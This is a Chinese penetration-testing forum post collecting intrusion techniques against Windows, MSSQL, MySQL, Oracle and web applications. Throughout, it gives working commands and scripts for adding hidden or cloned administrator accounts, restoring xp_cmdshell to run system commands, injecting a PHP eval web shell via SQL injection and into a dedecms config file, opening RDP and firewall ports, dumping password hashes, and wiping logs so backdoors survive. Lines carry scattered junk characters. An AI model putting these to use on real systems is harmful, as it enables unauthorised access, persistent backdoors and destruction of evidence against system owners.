找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 渗透技术大全
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4655|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* T* _; a+ j6 _# Z2 o7 Y  w1.net user administrator /passwordreq:no9 E" @' w5 T- A% r# D- v
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
  T. q# c% o3 Z2.比较巧妙的建克隆号的步骤9 A5 M/ Z; u& Q% O# v& X/ s
先建一个user的用户) g. g: r! {( i3 L
然后导出注册表。然后在计算机管理里删掉4 n% `0 b5 ]5 G' j
在导入,在添加为管理员组
- l2 Y- a* ]# U2 w  w3.查radmin密码6 P4 T$ K8 z( X0 F- K
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
0 v( }0 b* q4 O7 X$ Y/ W4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]  S; @* i$ Y  V
建立一个"services.exe"的项- b5 N+ d8 r# m' V
再在其下面建立(字符串值)! Q# o7 R. u- f* S0 D& Q
键值为mu ma的全路径, o) s! f* q* G( Z& ^
5.runas /user:guest cmd# {5 T  C2 R9 Y9 f7 b5 K
测试用户权限!
' x1 m$ f- _; l& j* Q' [$ l( Z' ?4 P6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?% y. b) ]7 j+ w, h( G
7.入侵后漏洞修补、痕迹清理,后门置放:/ h. O' b$ B  F# s8 Z  u5 w
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门1 y& ?5 I& S2 \% S2 U
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c' Z% S2 i: [( @8 P8 \

9 g* N2 ?  i# M) k5 K; Z: N  T. Hfor example
6 n) b2 j3 P5 v/ ^  _8 O% B! P: K0 W$ a- d1 j6 m" d2 l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'9 V9 `6 x% |' V7 c/ l
( b, ~: Q# e0 R1 b0 f- V  y0 ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'5 C+ g' G  G6 M+ S
& s' ?) c! T) _
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了; w# U& N/ C6 h
如果要启用的话就必须把他加到高级用户模式+ C5 \# t- [+ Q/ m& V( G
可以直接在注入点那里直接注入7 L9 U& Y& |' _, ]
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--5 ~; |- k/ g" D( ?6 d9 g: j! H
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
8 ~4 ^. E$ O' u$ I  N0 F或者
2 R7 \' ]  c5 B& k3 \' Osp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 `/ Y# ^  ], e  y来恢复cmdshell。6 t/ ~$ J2 z: Y9 P  B# C' }$ M

* f( R$ M9 y/ v) d- @- R分析器. [3 B' m( l5 C) d0 O! s
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
3 u$ E) ^, f: }% T6 F, A4 r. W) e然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
6 }' N6 `: ~, a  D) i* B9 Y10.xp_cmdshell新的恢复办法
' t8 h. W- ^* B& J+ L% Bxp_cmdshell新的恢复办法4 H2 ?! p* l: P( M
扩展储存过程被删除以后可以有很简单的办法恢复:% P# f' P5 C. J4 y: g* R5 `
删除. @! o& Y7 p) ~  G1 p
drop procedure sp_addextendedproc
* ]; C" C! |* g8 f$ B6 @drop procedure sp_oacreate
+ l2 K7 k, M3 \. \exec sp_dropextendedproc 'xp_cmdshell'
& Y( t- C7 }) H8 E, @. L; C) c. u+ J% z6 c2 H- x
恢复
2 n. N2 S1 z5 i& Fdbcc addextendedproc ("sp_oacreate","odsole70.dll")
5 A, y% H& H* b) L* Ddbcc addextendedproc ("xp_cmdshell","xplog70.dll")
, |7 k% [9 O( L' p" |
3 w1 e# u  l1 I/ j- K# t2 J这样可以直接恢复,不用去管sp_addextendedproc是不是存在9 _+ C/ n! {3 t" w  D) r
3 m- l' U: K* Q! E
-----------------------------' K0 P6 w1 I  c0 e0 G. S
' u0 E  j! L1 e' S/ i* ^' @+ u
删除扩展存储过过程xp_cmdshell的语句:: I: q4 v6 t) e8 O3 z' }
exec sp_dropextendedproc 'xp_cmdshell'# J3 G5 x. R% p
# e* q4 }, {, q0 r% x1 k
恢复cmdshell的sql语句/ e! w1 i8 B4 M4 @
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'# D" h6 o+ U, s+ Y7 D8 C( U3 `4 N
" f! f1 }! X& N- A/ _: L
' M0 Z, q! f8 J5 D
开启cmdshell的sql语句" c; M  s0 {" ?1 |* i$ ^9 A4 d

4 ?/ Q* @) S5 G' H2 s6 @exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'& R1 B8 h( \" I+ g# B* [3 F

7 v* T0 R5 z1 p1 K0 ?  _8 z2 }判断存储扩展是否存在: I; w. ]7 z4 x9 c( m. R, N3 x
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
- G: V5 c  y$ b返回结果为1就ok" v" H8 r: g+ k/ w* z
$ o) _/ e+ B2 |  t" Y) \3 O
恢复xp_cmdshell
7 A/ L5 Q% S+ I* w& ~; w% g" R' xexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 f9 X- \% P, X2 v4 D+ K+ a3 Q
返回结果为1就ok
4 y: M( L( K1 Y  m
/ r# R, `6 _! T1 n3 {否则上传xplog7.0.dll
# G2 B9 a. U/ Mexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
( v) H. `* I, h  k7 |3 R" S* F2 n$ W. ]9 Y* y( g. ~
堵上cmdshell的sql语句8 }( D* P1 }1 n. b/ e
sp_dropextendedproc "xp_cmdshel
8 [$ E4 a+ y+ L-------------------------( z" s8 t% m4 u
清除3389的登录记录用一条系统自带的命令:
4 O. W7 g7 G0 P" b* W  E9 wreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
; P; S. I" f7 W+ u: W0 g. s4 H. r2 o; _0 _  W+ z
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
' h7 ^8 i1 T: j! x1 p/ p在 mysql里查看当前用户的权限
7 s2 d8 _) R5 a( g' i0 U6 i- q" Gshow grants for  5 T/ i3 _( l9 f4 D+ ], E
8 @5 y# h! Z( r) o7 q( U6 u9 I* L
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
7 v. K# f) d/ ]$ I9 n
; W4 w. Q6 A9 L/ g, x
' v8 W4 ~3 W! \7 s: I' E0 p3 @( cCreate USER 'itpro'@'%' IDENTIFIED BY '123';5 w' p4 N1 b2 W( R3 a# ^/ k

% E+ B' P  m8 Z! f$ O0 IGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION! X7 q1 g5 Y1 I0 q+ d* r
! f4 _" D4 O) F- c: W- I
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 04 Y3 ]# z. u3 f0 W, V: `+ Q& i: W
. {4 S3 M. [& |3 P% a& r
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
) {- U1 M2 F5 R2 Y" J1 F' x! H0 R5 V
2 f$ M/ Q; y* p& s搞完事记得删除脚印哟。( ]6 j+ x' T+ Q" w8 t2 }* _) K. Y
- C5 |( R$ J! V$ K# L) a! Z0 p. X
Drop USER 'itpro'@'%';1 s% v7 S0 H% W! d* N1 X

( d8 ~# Z1 g/ p* i) G  Y. xDrop DATABASE IF EXISTS `itpro` ;& w+ Y" _+ r% h7 F$ j) G- A& z8 ^

1 {# o% k3 w, z6 [" W5 `" C当前用户获取system权限
) t; i$ f/ Z$ e- l' T" d5 h7 P/ qsc Create SuperCMD binPath= "cmd /K start" type= own type= interact/ q- V4 v! m; s0 i- N
sc start SuperCMD" x" H$ @+ t" V! Z
程序代码! O3 {; Q. p' f7 v+ |. l
<SCRIPT LANGUAGE="VBScript">( M5 c& E0 Y1 t. |4 k; F% q8 W* K
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
: P- h0 D3 E7 D( ^5 q# Ios="WinNT://"&wsnetwork.ComputerName
- ^' [% a& B- `Set ob=GetObject(os)
2 x* E" |6 d" r( U# B% tSet oe=GetObject(os&"/Administrators,group")
" p. B" j; O5 h# HSet od=ob.Create("user","nosec")0 @1 o; H' Y& a1 P: {! s: c% }
od.SetPassword "123456abc!@#"
: O& s! E, c' @2 _od.SetInfo
& `4 _# ]7 N3 k1 D% mSet of=GetObject(os&"/nosec",user)
% N: J: L/ T6 H; ]* Hoe.add os&"/nosec"7 |7 f. g4 o5 ~
</Script>; ?' Q% e) Y  n
<script language=javascript>window.close();</script>
2 `. q, G1 f2 T6 W
7 f! e7 g- l8 H0 `% w0 f) S. u
5 }9 P0 X" j1 a! k& T8 p% Z4 g
. k$ M) e5 |% ~- p
突破验证码限制入后台拿shell
/ }2 K  t5 k3 h6 V3 I7 J0 S程序代码
; Z8 d  ]5 j$ O8 N0 N% g6 |' cREGEDIT4 4 J: l5 m. Y) C  k: k5 A$ h1 T
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
9 _' p9 L( n! V- n0 {$ [& }"BlockXBM"=dword:000000003 p8 J$ `7 f- J; m
& h2 ~. T7 ]9 [2 E! ?9 |/ V. }  b
保存为code.reg,导入注册表,重器IE) {- H! G6 l+ w: z6 _
就可以了
  x' E; y3 ^/ O8 H4 S. m, r6 d" @union写马* {$ Q  I# b$ M; ~- u
程序代码! E% s  Z8 p8 S+ W. ~; M6 \
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*( g  F9 [2 r/ {: b6 ~

4 {: y& \9 q0 i" T! z" E6 C应用在dedecms注射漏洞上,无后台写马
7 }! O5 _# K) P: U9 {dedecms后台,无文件管理器,没有outfile权限的时候
: y# K, d2 r& _+ M在插件管理-病毒扫描里7 B7 g2 l  ?. r5 d
写一句话进include/config_hand.php里' P% a9 }& p# z: T9 X
程序代码$ r) d1 [+ P" w9 @# ]# K; Z
>';?><?php @eval($_POST[cmd]);?>& Z) P% b6 t0 ^- k& \0 H

, H8 T3 A4 V, Z( a& ^+ A4 X7 m9 z- ^5 _5 f8 A8 y! T
如上格式
3 Q9 K; F$ X9 k- T& I7 j- j; i7 z9 G3 {; g& y) A
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解% i$ [+ N5 p9 Y# t7 X- |
程序代码
& ]' T; A0 z0 K5 l8 qselect username,password from dba_users;
1 u: h, S( D9 Q; M2 \2 `
: f- n: v. c6 S: m) U* {6 p
' L- v) l5 T# H2 ]5 E6 F5 W! x/ Xmysql远程连接用户/ J% k7 z! P+ e0 ?. ~, Q& b
程序代码
1 ~, `% E7 f% Q
- r0 \; E2 X( h* W3 gCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
$ h8 n& k; N; Z7 b9 \GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
: q0 O) H+ m, s% e: FMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
" \1 i( S: H4 @+ Z1 C2 r' gMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;8 h. c8 ~7 u1 ^/ V

$ U0 R# r; ^. A& [: |
$ I5 z( H  K1 y3 a
8 p  r  G; J9 s0 A* I- q/ R, B3 [' y  C/ {# w7 c% S
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
* h5 u9 P  i, Z! Q) V% f" L; m( J6 u
3 F. o5 a: v* O3 s9 U% V1 Z2 H1.查询终端端口6 _+ W+ B% l1 M6 a2 m& I1 i

# p+ _+ \* q) o! `2 Z" e6 c& Bxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
; c- j" `3 F: ~; Q: b3 j$ w9 P* K) K# |' \
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"8 h) T- z4 K, T0 e
type tsp.reg
0 y: X5 ]0 c- }! ~  j, K
! M% n! d0 K: j0 g2.开启XP&2003终端服务
2 e" p. B% R& W- P. F/ L$ V
1 s& S, G4 f( g' Y- M/ C; {
( b9 \( _3 P# H$ @8 \REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f) t; q- R" b- ^2 _" u

! N; {7 L( L0 j$ R6 Q- b( r9 J' _4 D7 g& b) e: Q
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3 A  M8 Z9 t% u  g3 F6 Z8 w5 e

- y' U4 n4 p8 i+ t# x" P3.更改终端端口为20008(0x4E28)$ ]- p0 a* m4 V9 _

& M( n. I: f, P  ~( y3 ]REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4 @( A1 m7 B# h0 k& g" X- `8 T; |3 [) g: u2 ~* l" ^
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; K; E9 X  e" }/ u' r+ @0 i1 A- [8 i! i7 [
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制& L* I7 L4 F1 i

! I3 N4 K# [+ A- \! wREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f  u0 F: J7 |  E7 \6 m# \2 _

) b8 i. l% a1 p# M* J% {
  q" T+ Q4 X+ C0 h4 w8 E( M9 V0 b5.开启Win2000的终端,端口为3389(需重启)
# M/ T, T2 K, b, `( f/ ?: e$ @6 l
; U- Z* V7 G5 P$ Q1 h; d: i. Yecho Windows Registry Editor Version 5.00 >2000.reg ! }% A+ I' R( q/ F
echo. >>2000.reg6 y9 C0 R8 m: [4 c
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ( _2 M. \' v7 v- e
echo "Enabled"="0" >>2000.reg ! ~- e# `- _! x6 J7 d# Y, H" d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg , u. f0 V  L, d# v7 M: ]: `
echo "ShutdownWithoutLogon"="0" >>2000.reg 1 n& J7 @. R' f% V3 j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg . C* l5 F( {% g+ A
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg % A* `2 h6 }1 J+ }4 G/ P/ J( T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
+ H/ Q" n! a) y" W  lecho "TSEnabled"=dword:00000001 >>2000.reg
9 I3 g0 }1 g6 Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg % D  d# H  n+ ]
echo "Start"=dword:00000002 >>2000.reg
; D; A/ O% W; m3 Q8 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg - R+ a' H( x8 a5 W
echo "Start"=dword:00000002 >>2000.reg
" }! J, S& z( H' l9 o) d5 wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 2 M1 s4 h/ O1 z
echo "Hotkey"="1" >>2000.reg # }/ r; q$ a) V1 t* U5 `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ; y! ~: B# V* w/ A% n- `9 i
echo "ortNumber"=dword:00000D3D >>2000.reg & N+ j; j/ z- p, u% ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
1 s) ]( s) T$ m) x8 xecho "ortNumber"=dword:00000D3D >>2000.reg7 g/ _/ h) I- B0 h' \
6 v3 U5 A$ |  F
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)- T$ T: }1 M9 X
5 |; I9 B. w; L  d: z3 Q
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf$ H4 A: f" c6 h# q7 Z- Z2 }
(set inf=InstallHinfSection DefaultInstall)
5 N& i$ j- E( fecho signature=$chicago$ >> restart.inf
/ w) J: a/ v5 j6 G/ c* jecho [defaultinstall] >> restart.inf
. e* e3 K2 W( K4 }% y4 g7 H+ F1 Xrundll32 setupapi,%inf% 1 %temp%\restart.inf
. a" e( p# w; z! S; ?0 l
0 J, O1 ]/ b4 [$ H% F9 x# p" E$ A' x
) ?5 h& k' R5 M1 |* @! c7.禁用TCP/IP端口筛选 (需重启)8 k+ r/ D) ]  X5 x0 E0 G
, v$ X* p! W. Q+ o" Y1 r+ i
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f1 T2 U$ Y/ g" \1 e5 H

) q1 `4 A2 t, L- z/ C8.终端超出最大连接数时可用下面的命令来连接
! b9 e4 W0 N& X
" F  |5 O0 ^) a. d( }mstsc /v:ip:3389 /console
$ v9 |# E! z8 X
( @( O4 Q3 \6 }. x9.调整NTFS分区权限; X6 k, d7 j" R4 H0 [3 [. i
, a- P/ d% w5 v3 B' o6 o8 E
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
# D# k8 z- g7 C" z
1 V4 K6 g6 Q' b( H6 ycacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
+ V2 C5 T/ g& S# n8 T' I( }) C) J# m6 W9 g0 t/ x
------------------------------------------------------
2 a- t) j. Q. X: F6 D3389.vbs
2 O: t5 y, Z% Y" G1 {On Error Resume Next( m6 C2 W, y9 S" M% p) Q* i: |; g5 x
const HKEY_LOCAL_MACHINE = &H80000002
/ \/ Y! Z: K& N% G! c) ]5 xstrComputer = "."+ w% |3 T! w$ \, e7 {7 {: h
Set StdOut = WScript.StdOut& S  [! ?' _' Z: U. C, k
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
: p8 N: O2 |6 m) GstrComputer & "\root\default:StdRegProv")
" \' C/ |8 u) o% f& ~" p1 H% C& c  F4 ~! BstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
; @! S& l2 Y6 }; Loreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
0 [) t: z, z& k: G; c$ pstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"4 m( r6 i$ N5 q# @, u& w- w
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 T* k1 v" k' c* E, y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"6 \: w5 S* h6 i% p, d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 p; ]/ s2 u1 p9 L- j! k
strValueName = "fDenyTSConnections"1 W$ `( n, D6 l# n* s6 e
dwValue = 0
3 j9 j* S' T1 Poreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* p# D! {8 v2 M8 _( W6 S- `2 e% T4 tstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"5 i8 m0 z, I0 }9 k% j
strValueName = "ortNumber"+ R7 s& s- {% d
dwValue = 3389
( H( W4 C/ I  ]& q& loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
/ o, H1 k/ W6 T3 Z& m, s! YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  y) J/ I" K# @6 j6 a
strValueName = "ortNumber"4 J; }/ ]9 M$ F
dwValue = 33898 @" T6 `% M5 _4 x
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! w) \* f6 C# J% `% j' E" c5 KSet R = CreateObject("WScript.Shell")
! C1 ~; L6 s" c! f& k3 @+ {1 nR.run("Shutdown.exe -f -r -t 0") & H, N9 ~+ ]) A, x
0 {! u/ L$ k) W) ~0 \* h4 W
删除awgina.dll的注册表键值
' r/ {% S' j% r# f/ V& X( Q9 u程序代码
" i% X. H* W) x8 ^' P. J, g6 K9 y  P4 a" p6 D& J: ]" q( P( i
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f- e( i2 `1 O" t$ w7 O

* x, |( X9 @. Y' f. @* y
" \1 [8 j' r" e7 z6 e
; L& f+ o. p; N) g7 `+ }! _. t' ~! X, J  g5 E
程序代码
( c& f- g, y8 O: q% e# HHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash8 r+ X  o) \) X1 i) |; N" N# M8 X) f

5 {) p* C) x# G: d; ?+ X7 }0 d% D设置为1,关闭LM Hash* c) F' _& Y/ k+ [
7 z% _/ O+ t- j* q# I
数据库安全:入侵Oracle数据库常用操作命令
2 Y7 ~9 w( L/ d& ?8 i! B最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。$ P& |9 q- Y4 L. m' ]  p
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
. V- a/ @  {5 z! d( b5 B2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
4 O* n; @! m2 f1 ]6 E2 m! _) ^3、SQL>connect / as sysdba ;(as sysoper)或
/ b' M' X& @) i6 j# W# H" q0 Y8 Nconnect internal/oracle AS SYSDBA ;(scott/tiger)
1 t# ~& A. m7 h2 N. ]conn sys/change_on_install as sysdba;/ S& ]+ b3 G5 b/ b7 n) S
4、SQL>startup; 启动数据库实例
, C+ R1 @( N/ U8 y4 L  Y+ m& s. D# h5、查看当前的所有数据库: select * from v$database;
& A6 g3 R" E" w! Zselect name from v$database;
& u) s$ m8 Z/ h# B7 e/ W6、desc v$databases; 查看数据库结构字段  Y! d) B5 k9 `0 o* C
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:* I! s$ Z4 z( _6 K4 n/ }
SQL>select * from V_$PWFILE_USERS;
6 ~! ^, g  [* K) _, a- Z6 l3 ~Show user;查看当前数据库连接用户! f. U* u7 G- v
8、进入test数据库:database test;
( W- H* S$ ~4 s; x9、查看所有的数据库实例:select * from v$instance;7 L1 o! z  [; Z; A/ i% d
如:ora9i) w* i) r/ m! r) v
10、查看当前库的所有数据表:
  I  B5 ^2 C2 ~SQL> select TABLE_NAME from all_tables;
  l9 t' Z/ G) H7 c# hselect * from all_tables;" s. _8 F1 r: ~  w" L+ [! C. S5 K: I
SQL> select table_name from all_tables where table_name like '%u%';  K5 n" l) n5 O! s* k
TABLE_NAME8 V! v8 [. Z8 B
------------------------------
* R+ A7 Q2 l1 Y: q4 {+ S0 m_default_auditing_options_
+ G+ \( ^: G$ q; j, L* j11、查看表结构:desc all_tables;7 {0 p& \6 p6 U3 ?: A
12、显示CQI.T_BBS_XUSER的所有字段结构:
# F" G8 \' S7 m( _6 l9 Sdesc CQI.T_BBS_XUSER;& l/ [0 @  ~5 G, ]) S& m; e/ a
13、获得CQI.T_BBS_XUSER表中的记录:* N8 E% `  F7 x& [7 E. e9 D$ j1 C
select * from CQI.T_BBS_XUSER;
  e/ J+ `( k" b, j6 H14、增加数据库用户:(test11/test)1 V5 R" u/ O7 v3 {  N1 M
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;' h2 N4 h- _% w3 b6 s3 s3 T
15、用户授权:
' X+ U; z/ S, Z$ U, N9 S* ~grant connect,resource,dba to test11;
% K# H% y# t9 \% j8 S8 qgrant sysdba to test11;
( J  P7 l/ U* Fcommit;0 r9 C, n' T4 f( C' U) r/ L
16、更改数据库用户的密码:(将sys与system的密码改为test.)
+ i: k, v. [( s; g! `* Kalter user sys indentified by test;. r( |7 l( w- ^2 G, _2 l9 G+ \9 I
alter user system indentified by test;) c5 m) p% s  {& L9 T+ D
1 m4 ~! \- y0 m. X
applicationContext-util.xml
* y8 a) X. ~) |5 S0 e" ?: aapplicationContext.xml4 L. K# h* b4 K8 g
struts-config.xml$ |; D# Y* u# F7 i
web.xml" p- t, x& o% s5 n" Z  ^4 S7 Q: @* Q1 A6 G
server.xml
2 Y7 G7 {* x! vtomcat-users.xml3 U+ i% f' }" i0 n: l, v# f
hibernate.cfg.xml& d+ ^3 ?4 {1 D% M9 ?  p8 }
database_pool_config.xml
- {+ |$ D5 p3 O! l. U' I; [. \' D$ S: z- Y. b2 Q
0 U9 j$ M* Y7 s$ ^
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置9 ]6 T: `/ R- A
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini" H" r, r6 c  n( j! b6 h
\WEB-INF\struts-config.xml  文件目录结构
' l% U( d- Z; G
4 m& p2 }& |2 g" |0 M8 I/ fspring.properties 里边包含hibernate.cfg.xml的名称
' k1 I. `/ [/ G  k& E7 D
6 T# Z" a  t8 h! z- V) z7 h& D0 p( c$ d: k
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
0 h& h" |/ q/ k2 |& V* d% p4 c2 y5 ]) J) P+ O0 r6 B9 b1 j4 T7 }9 \
如果都找不到  那就看看class文件吧。。$ s: D* c" L( Z

8 |3 |: G9 R- T. n( Y4 Q测试1:
! `* L6 G# o/ e: pSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t14 q0 ?2 @$ }! Z, o2 \2 p3 T
  s4 c0 ]& a5 \4 U$ D
测试2:6 R9 o3 U4 O! F- G; b

& K( m; p5 d6 h1 b; D& xcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
. t5 \4 J  T7 v7 D
- I) j1 r3 G/ Ldelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
2 V  |7 F8 f: A; ]  n
. Q" ~/ {, A' H1 `3 Y% dSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
; M' x0 @' M2 k8 Y4 d
) N$ ^$ P# i  m' ?/ a6 D2 U0 f查看虚拟机中的共享文件:) p/ E7 w4 u% u) p6 P9 f' {0 ?) j# j
在虚拟机中的cmd中执行+ Q8 R: R, k5 r1 z9 C  }8 y! A
\\.host\Shared Folders% P3 g$ e0 E. Z! J( _& T, s
$ K7 A" z% }, R' e" v* ^( P, c
cmdshell下找终端的技巧
/ M3 i' I+ Q' _/ ]3 o" v6 Y找终端:
9 z9 h8 E6 J& T2 I5 D7 y第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
% _, Z: k" v4 I   而终端所对应的服务名为:TermService $ P$ W; H* v  A# y* B
